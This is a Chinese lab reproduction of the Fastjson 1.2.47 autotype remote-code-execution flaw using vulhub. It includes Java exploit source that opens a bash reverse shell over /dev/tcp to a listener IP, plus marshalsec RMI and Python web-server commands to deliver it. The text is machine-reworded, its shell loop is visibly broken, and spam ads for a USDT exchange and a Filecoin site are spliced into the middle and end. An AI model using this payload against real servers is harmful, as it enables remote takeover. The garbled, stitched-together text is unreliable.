filecoin官网（www.ipfs8.vip）：手艺分享 | Fastjson-RCE破绽复现

Fastjson提供autotype功效，允许用户在反序列化数据中通过 @type 指定反序列化的类型，其次Fastjson自界说的反序列化会挪用指定类中的setter方式和部门getter方式。
当组件开启autotype而且反序列化不能信的数据时，攻击者组织的数据（恶意代码）会进入特定类的setter或getter方式中，可能会被恶意行使。
影响版本
Fastjson1.2.47以及之前的版本

复现

1.1 环境准备

攻击机1

用于接受反弹shell
系统：Win10 x64
安装nc，burpsuite
win10中需安装nc，用于监听反弹的shell。
在win10下，在nc官网(https://eternallybored.org/misc/netcat/)下载会报毒被阻挡。
可以使用nmap中重置的ncat(https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe)，与nc使用无区别。
下载后进入，ncat所在目录，执行ncat，泛起如下输出则安装乐成

攻击机2

提供一些需要服务
系统：Ubuntu
需安装：marshlsec ( https://github.com/mbechler/marshalsec )（用于启动RMI服务）、python环境（用于启动SimpleHTTPServer服务）、openjdk
marshlsec下载后，需要使用mvn打包，无mvn下令需要安装Maven
marshlsec下载后，进入文件目录执行sudo mvn clean package -DskipTests，完成后会在目录的target目录中发现两个jar包

受害机

系统：Ubuntu （与上述提供RMI和Web服务的机械可以是一台或差异）
需安装：docker、docker-composer、vulhub

1.2 示意图

1.3 复现流程

在 攻击机1 开启监听

在受害机上启动环境，进入vulhub中的/fastjson/1.2.47-rce/，使用如下下令启动服务：

,

USDT跑分平台

U交所（www.payusdt.vip）是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U交所开放usdt otc API接口、支付回调等接口。

,

， docker-compose up -d

在 攻击机1 上接见该服务，如下则为乐成

组织恶意代码文件vim Exploit.java，内容如下

代码中192.168.253.129/6666修改为攻击机1的ip和监听反弹shell的端口

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        //Process p = Runtime.getRuntime().exec(new String[]{"cmd","/c","calc.exe"});
      Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/192.168.253.129/6666;cat &5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

编写完成后，对该文件举行编译天生对应的class文件

， javac Exploit.java

在 攻击机2 上启动RMI和Web服务
· 启动Web服务
， python -m SimpleHTTPServer 8080

使用 攻击机1 接见 攻击机2开放的Web服务，如下则乐成

· 启动RMI服务
进入marshalsec打包好的jar包目录执行下令，如下
192.168.253.138:8080 为上述Web服务地址和端口，需自行修改
8888 可为随便端口
， java -cp marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.RMIRefServer
"http://192.168.253.138:8080/，Exploit" 8888

在 攻击机1 上组织恶意请求

发送请求后，守候ncat获取反弹shell，可见在恶意代码中组织的下令执行，乐成反弹shell，可以执行下令

万利逆商官网

万利逆商官网（www.ipfs8.vip）是FiLecoin致力服务于使用FiLecoin存储和检索数据的官方权威平台。IPFS官网实时更新FiLecoin（FIL）行情、当前FiLecoin（FIL）矿池、FiLecoin（FIL）收益数据、各类FiLecoin（FIL）矿机出售信息。并开放FiLecoin（FIL）交易所、IPFS云矿机、IPFS矿机出售、租用、招商等业务。